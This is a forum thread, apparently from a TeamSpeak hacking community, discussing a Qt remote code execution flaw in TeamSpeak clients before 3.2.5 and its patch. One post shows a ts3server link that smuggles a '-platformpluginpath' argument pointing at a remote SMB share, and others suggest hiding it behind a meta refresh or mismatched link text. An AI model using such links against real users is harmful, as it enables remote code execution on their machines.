Discussion Remote Code Execution vulnerability in the Qt (Client < 3.2.5)

fyfywka

Contributor
Joined
Sep 10, 2015
Messages
110
Points
103
Location
Headquarters KGB

Bluscream

Retired Staff
Contributor
Joined
May 8, 2015
Messages
959
Points
171
Location
Germany

If it's that, you would need to trick the user to clicking something like [URL=ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share]ts3server://voice.teamspeak.com[/URL]
 
Last edited:

DrWarpMan

Member
Joined
Jul 1, 2016
Messages
16
Points
41
Age
23
Was it any guy from r4p3 that found this?
 
Last edited:

Kieran

Tag me
Contributor
Joined
Jan 1, 2016
Messages
461
Points
122
Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?
 

InVaDeR359

Active Member
Joined
May 29, 2017
Messages
161
Points
72
Location
Error 403
Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?
I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]
 

Kieran

Tag me
Contributor
Joined
Jan 1, 2016
Messages
461
Points
122
I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]
Also a possibility but that my spark suspicion, when someone copies the link instead of clicking right away when the displayed URL is different from the one that is linked
 

Asphyxia

Server Monkey
Administrator
Joined
Apr 25, 2015
Messages
1,212
Points
252
Age
26
Location
North America
Was it any guy from r4p3 that found this?
No, any software development frameworks offer a lot of extensibility to developers so they can work with and around the operating system. With frameworks being so powerful, they have the potential to be abused and ultimately misused for malicious purposes by hackers. This issue was found regarding QT, not specifically TeamSpeak but thankfully they (TeamSpeak developers) are staying on top of security patches - probably because we have made them rightfully paranoid which is a GOOD thing. We have done our job, now we are safer.

With that said, there may be more security issues with many frameworks like QT (TeamSpeak uses this framework for their software).

One example can be found here: https://securiteam.com/unixfocus/5NP0O2KDPI/ or http://scary.beasts.org/security/CESA-2004-004.txt

I believe something similar to this was used when we developed the avatar crasher: https://r4p3.net/threads/teamspeak-3-avatar-crash-client-3-0-0-3-0-17.335/



If we found a way to utilize this vulnerability, we would have released a PoC (Proof of Concept) demonstrating how one could use this for educational purposes.

People like @Harrasan think everything in life comes free and no one has to work for anything, he is actually really close to being banned because you can find him complaining about everything and thinking proficient security researchers need $0 to run expensive servers and study for $8,000 reverse engineering classes for becoming a malware analyst and incident responder for the FBI/NSA/etc.

Update: A PoC is over here https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739



Looks very simple... a security mistake that is small with big issues possible.
 
Last edited:

tagKnife

Well-Known Member
Joined
Oct 2, 2015
Messages
335
Points
106
Age
29
Origin got hit by the same exploit.

AMD also uses QT, but looks like they don't have a URI registered, at least not on my system.
 
Last edited:

Top